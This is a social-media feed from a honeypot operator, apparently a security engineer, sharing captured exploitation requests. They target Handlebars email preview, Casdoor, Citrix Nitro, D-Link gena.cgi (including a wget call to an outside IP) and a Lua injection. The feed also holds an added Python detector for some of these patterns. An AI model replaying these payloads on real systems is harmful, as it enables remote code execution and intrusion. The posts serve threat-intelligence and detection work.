Niels Heinen

70 Followers
61 Following
85 Posts
Information security engineer - security at scale - honeypots
GitHub: https://github.com/mrheinen

@virustotal maybe it's worth looking into increasing the free quota based on the quality of reports. If a source reports a lot of malware with unique signatures, then perhaps you don't want to enforce the default quota and miss out on reports (on days when the source is busy).

I bet you already have some sort of usefulness score for sources anyway?!

#infosec #dfir #security #cybersecurity #virustotal

Seeing exploitation of CVE-2026-33937, but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937

Here is a full request:

POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}

#dfir #honeypot #infosec #cybersecurity


There seems to be a remote code execution issue in Casdoor? My honeypots are seeing these scans:

GET /api/run-casbin-command?language=exec&args=["enforce","-m","[request_definition]\nr = sub, obj, act\n\n[policy_definition]\np = sub, obj, act\n\n[role_definition]\ng = _, _\n\n[policy_effect]\ne = some(where (p.eft == allow))\n\n[matchers]\nm = r.sub == p.sub","-p","p, x, x, x","sh","-c","id"]&t=2026-03-30T16:12:50Z&m=1191e3dce3682e9382680387ffe783bb87cd213a48f4f1fa6c10644d039f4dc6 HTTP/1.1
Host: x.x.x.x:8000
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15

#casdoor #honeypot #infosec #dfir #cybersecurity

Citrix Nitro SDK - Command Injection (CVE-2015-2838), webapps exploit for Linux platform (Exploit Database)

Interesting Netscaler payload caught by my Lophiid honeypots:

GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot

Does anyone know this vuln?

#honeypot #dfir #infosec #cybersecurity

After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be coincidence, but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan, for example, shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I've seen this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel
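Added example, not code from the posts above or from the lophiid project: a small Python detector that flags, on raw HTTP request lines, the three command injection patterns captured in the Casdoor, Citrix Nitro and D-Link posts in this feed. The sample request lines are constructed, modelled on those captures, with the real hosts replaced by a documentation address; the rule labels and the `"sh"`-in-args check are my own choices.

```python
import re
from urllib.parse import unquote, urlsplit

# Shell metacharacters that have no place in a filename or a UPnP service id.
SHELL_META = re.compile(r"[`;|&]|\$\(")
REQUEST_LINE = re.compile(r"^(\S+) (.+) (HTTP/\d\.\d)$")

def query_params(query):
    """Split on '&' only: ';' is part of the payloads, so parse_qs is avoided."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params

def shell_in(param):
    """Rule predicate: shell metacharacters inside one decoded parameter."""
    return lambda params: bool(SHELL_META.search(params.get(param, "")))

def casbin_exec(params):
    """Rule predicate (assumed): enforcer asked to run with language=exec and a shell in args."""
    return params.get("language") == "exec" and '"sh"' in params.get("args", "")

# (label, request path, predicate over the decoded query parameters)
RULES = [
    ("CVE-2019-17621 D-Link gena.cgi injection", "/gena.cgi", shell_in("service")),
    ("Citrix Nitro systemfile injection", "/nitro/v1/config/systemfile", shell_in("args")),
    ("Casdoor run-casbin-command exec", "/api/run-casbin-command", casbin_exec),
]

def classify(request_line):
    """Return the label of the first matching rule for a raw request line, else None."""
    m = REQUEST_LINE.match(request_line.rstrip("\r\n"))
    if not m:
        return None
    url = urlsplit(m.group(2))  # splits the path from the query on the first '?'
    params = query_params(url.query)
    for label, path, check in RULES:
        if url.path == path and check(params):
            return label
    return None

# Constructed samples modelled on the captures above; hosts replaced with 203.0.113.5.
SAMPLES = [
    "SUBSCRIBE /gena.cgi?service=`echo ; wget http://203.0.113.5/x -O /dev/null; echo >` HTTP/1.1",
    "GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20203.0.113.5 HTTP/1.1",
    'GET /api/run-casbin-command?language=exec&args=["enforce","-m","m = r.sub == p.sub","sh","-c","id"] HTTP/1.1',
    "GET /nitro/v1/config/systemfile?args=filename:ns.conf HTTP/1.1",  # benign: no metacharacters
]
```

Feeding the first request line of each honeypot capture to `classify` is enough; the header lines carry no signal for these rules.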

My lophiid honeypots use various LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 Flash, and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex, and it understood that the resulting string was a shell command that echoed the string "RCE_TEST_123".

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential.

#infosec #dfir #honeypot

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password="

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812."

*sigh*

#dfir #infosec #cybersecurity #honeypot